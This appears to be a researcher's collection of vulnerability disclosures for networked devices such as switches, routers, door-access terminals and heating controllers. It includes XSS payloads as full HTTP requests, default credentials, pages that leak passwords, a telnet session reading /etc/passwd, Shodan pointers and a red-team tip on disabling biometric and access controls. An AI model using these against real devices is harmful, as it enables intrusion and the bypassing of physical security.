Alcatel-Lucent OmniSwitch 6250 Switch sys_filesystem_info_si.html Multiple Parameter Stored XSS

The Alcatel-Lucent OmniSwitch 6250 Switch has a cross-site scripting (XSS) vulnerability in the /sys/content/sys_filesystem_info_si.html page (CVE-2016-78002). An authenticated user with permission to update the fields can inject arbitrary JavaScript into three fields that will be stored and displayed on /phys/content/phys_chs_info_stable.html when viewed. The fields/parameters are Contact (EmWeb_ns:mip:208.T1:O1 parameter), Name (EmWeb_ns:mip:209.T1:O2 parameter), Location (EmWeb_ns:mip:210.T1:O3 parameter) which are updated by a POST request.

The payload looks like:

EmWeb_ns%3Amip%3A208.T1%3AO1=Alcatel-Lucent+%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27df-location%27%29%3C%2Fscript%3E&EmWeb_ns%3Amip%3A209.T1%3AO2=vxTarget%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27df-name%27%29%3C%2Fscript%3E&EmWeb_ns%3Amip%3A210.T1%3AO3=vxTarget%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27df-location%27%29%3C%2Fscript%3E&EmWeb_ns%3Amip%3A211=Apply

KZ Broadband iSurf 1004 / 1008 Multiple Vulnerabilities

KZ Broadband Technologies, LTD. iSurfTM 1004 and 1008 Integrated Access Devices install with a default admin account for the web interface according to the manual.

I confirmed this works on iSurf 1004 V2.10 B02D09 Pack 02, iSurf 1004 IAD V2.10 B02D09 Pack 03 and iSurf 1008+ V2.10 B02D09 Pack 23.

The router allows multiple accounts and offers different access levels making cross-site scripting a concern. There is a very basic XSS bug (CVE-2016-78001):

GET /en/cgi/SysSetContact.cgi?sys_contact=DF”><scr1pt>alert(‘DF’)</scr1pt> HTTP/1.1

The script will render on /en/sys_info.htm:

<td><textarea cols=”60″rows=”5″id=”contact”class=”select”></textarea>
<input type=”hidden”name=”sys_contact”value=”DF”><scr1pt>alert(‘DF’)</scr1pt>”>

Screenshot PoC:

Barix Streaming Client Multiple Vulnerabilities

The Barix Streaming Client is a product that “can deliver high quality branded audio in real time via the internet or a local network to an unlimited number of locations and gives the option for localized and targeted ad insertion too, all via live streaming.”

It uses a web interface for device management. By default it does not require authentication and does not appear to allow you to set a user account just a password. Version B3.14 was tested and found to have additional problems!

Unauthenticated access –

You can manipulate streaming settings and change the audio the person hears –

Under Configuration -> Advanced Settings, the ‘User Agent’ field is not sanitized. Inserting script code triggers a POST request to /setup.cgi and updates the ‘S517’ parameter allowing for cross site scripting (CVE-2015-78000) that renders on uifadvanced.html –

It also renders on /ixstatus.html –

The security settings that allow for a password –

You can also manually reboot the device or create a script that will continually reboot it –

Smobile MX230 Mobile Router Multiple Vulnerabilities

The Smobile MX230 Mobile Router (Shodan search) with software revision R547 has a couple of vulnerabilities.

First the default credentials are admin / admin123.

Second the /3_advanced_Wi-Fi_Settings.html page discloses the wireless password cleartext (CVE-2014-78000) via HTTP:

AXESS TMC X1 / X2 Multiple VUlnerabilities

AXESS TMC makes a set of terminals that manage Time & Attendance as well as Access Control. For example the X1 and X2 perform a lot of functions in a compact unit and still offer remote management capability (Shodan search and look for “X1/X2 Configuration”).

These devices have default administrator credentials for the web and FTP interface: admin / admin

As an admin you can gain access to other passwords due to them being stored in plaintext. For the web interface they are shown on the different screens. For FTP (or HTTP browse file menu) they are available in the PARAMETERS.TXT file:

OperatorPassword=00000
RemotePassword=admin

[GPRS]
[..]
User=””
Password=””

[FtpClient]
ServerURL=
User=””
Password=””

[USB]
Enabled=1
PasswordUSB=00000

There is an XSS vulnerability in /file_manager.cgi (CVE-2013-78000) via file upload as demonstrated here:

For red teamers access to this device could allow for remote disabling of physical security features. The /biometric.cgi page lets you manipulate the biometric sensors or disable them completely if they are already enabled. It isn’t as good as popping the door locks but sure makes it easier for physical access!

The /access.cgi page can also let you manipulate access controls or disable them completely:

D-Link DS-624S Multiple Vulnerabilities

The D-Link DS-624S router (Shodan search) contains two default unpassworded accounts according to the user manual.

admin / (blank)
user / (blank)

In addition, the /Tools/tools_admin.htm page will send the cleartext admin password hash (in 10 different places) over HTTP (CVE-2013-78001).

ASUS WL520gu Wireless Router Multiples Vulnerabilities

The ASUS WL520gu Wireless Router (Shodan search) has a default account of admin/admin. It uses basic authentication so the “logout” function doesn’t properly terminate the web application session allowing persistent access from the browser that previous authenticated to it.

Also there are two pages that return cleartext passphrases and obscure them with javascript:

http://localhost/Basic_GOperation_Content.asp
WPA-PSK passphrase returned in clear (CVE-2013-78002):

http://localhost/Advanced_Wireless_Content.asp
WPA Pre-Shared Key returned in clear (CVE-2013-78003):

By default telnet is enabled allowing remote admin access using the same default:

df:/home/df # telnet 1.2.3.4
Trying 1.2.3.4…
Connected to 1.2.3.4.
Escape character is ‘^]’.
WL-0022159F09A9 login: admin
Password:
[admin@WL-0022159F09A9 root]$ cd /etc
[admin@WL-0022159F09A9 etc]$ cat passwd
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/usr/local/root:/bin/sh
nobody:x:99:99:nobody:/:/sbin/nologin
[admin@WL-0022159F09A9 etc]$

IQ3 Trend LAN Controller – Multiple Reflected XSS

Trend Control Systems makes a series of products called IQ3 controllers running IQ3 Excite software (Manual). From a Shodan search I saw I poked at one without authentication. By default you are given system guest access which lets you see the status of components. Some of these pages allow for cross site scripting (CVE-2013-78004).

1. K.htm ovrideStart Parameter Reflected XSS

GET /K.htm?ovrideStart=dfdfdf&ovrideStart=dfdfdf”><alert>(‘DF’)</script>&ovrideStart=0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://1.2.3.4/K.htm?ovrideStart=df&ovrideStart=0
Proxy-Connection: Keep-Alive

2. Z.htm ovrideStart Parameter Reflected XSS

In addition there are 10 sub pages in the format Z#(W).htm for each of 10 zones. Each of these pages have a reflected XSS in the same parameter:

http://1.2.3.4/Z2(W).htm?ovrideTitle:d=Normal%20Week”><alert>(‘DF’)</script>

3. P.htm ovrideStart Parameter Reflected XSS

4. S.htm ovrideStart Parameter Reflected XSS

Dreambox Bouquet Editor – Multiple XSS

Dreambox Bouquet Editor is a third-party plugin for Enigma2 set top box software to more easily manage bouquets. (Shodan search)

#1 /bouqueteditor/web/getservices newName Parameter Stored XSS (CVE-2013-78005)

Visit http://10.0.1.1/bouqueteditor/ and rename a bouquet with a standard XSS string. The next time /bouqueteditor/web/getservices reloads the payload fires.

POST /bouqueteditor/web/renameservice?sRef=1:7:1:0:0:0:0:0:0:0:FROM%20BOUQUET%20%22userbouquet.___script_alert__df____script___tv_.tv%22%20ORDER%20BY%20bouquet&mode=0&newName=%22%3E%3Cscript%3Ealert(‘findme’)%3C%2Fscript%3E HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 10.0.1.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.1/bouqueteditor/
Cookie: %7B%22updateCurrentInterval%22%3A120000%7D; %7B%22updateCurrentInterval%22%3A120000%2C%22updateBouquetInterval%22%3A300000%7D
Proxy-Connection: Keep-Alive
Content-Length: 0
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache,no-store
Expires: -1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

#2 /bouqueteditor/web/addbouquet name Parameter Stored XSS (CVE-2013-78005)

Add a new bouquet and use your regular XSS string. As soon as it is added the page will refresh and trigger the code:

POST /bouqueteditor/web/addbouquet?name=%22%3E%3Cscript%3Ealert(‘DF’)%3C/script%3E&mode=0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 10.0.1.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.1/bouqueteditor/
Cookie: %7B%22updateCurrentInterval%22%3A120000%7D; %7B%22updateCurrentInterval%22%3A120000%2C%22updateBouquetInterval%22%3A300000%7D
Proxy-Connection: Keep-Alive
Content-Length: 0
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache,no-store
Expires: -1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Heatmiser NetMonitor – Multiple Vulnerabilities

“The Heatmiser Netmonitor is a self contained unit allowing you to control your heating system over the internet from any web browser. Simply plug the Netmonitor in to your router and take complete control.” (Shodan search)

Affecteed: NetMonitor 1.04, 1.1, 3.02, 3.03, 3.7, 3.8 for default creds 3.8 tested for rest

#1 Default Admin Credentials

According to the manual the default is admin / admin.

#2 Cleartext Admin Password Disclosure

GET /networkSetup.htm HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 192.168.1.49
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.49/left.htm
Cookie: hmcookie=0
Proxy-Connection: Keep-Alive

#3 Multiple Stored XSS (CVE-2013-78006)

Using the standard “>alert(‘DF’) XSS string the following pages are vulnerable. They require admin authentication or can exploited via cross-site request forgery (CSRF):

POST /statSetup.htm HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 192.168.1.49
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.49/statSetup.htm
Cookie: hmcookie=0
Proxy-Connection: Keep-Alive
Content-Length: 424
Content-Type: application/x-www-form-urlencoded

rdbkck=0&statname=Towel+Rails%23Utility+Room%23Kitchen%23Dining+Room%23Lounge%23Bed2+%26+En-suite%23Bed3%23″>alert(‘DF’)%23Upstairs+Rads%23Room+10%23Room+11%23Room+12%23Room+13%23Room+14%23Room+15%23Room+16%23Room+17%23Room+18%23Room+19%23Room+20%23Room+21%23Room+22%23Room+23%23Room+24%23Room+25%23Room+26%23Room+27%23Room+28%23Room+29%23Room+30%23Room+31%23Room+32&statmap=11111111100000000000000000000000

These pages are also affected:
/sensorSetup.htm – POST Method – snstitle, snstemp and snsalmen parameters (likely 8 more but didn’t test)
/inputSetup.htm – POST Method – inputtitle parameter
/outputSetup.htm – POST Method – outputtitle parameter

There rest of the setup pages are probably vulnerable since it didn’t seem like anything was being sanitized but I didn’t have time to check.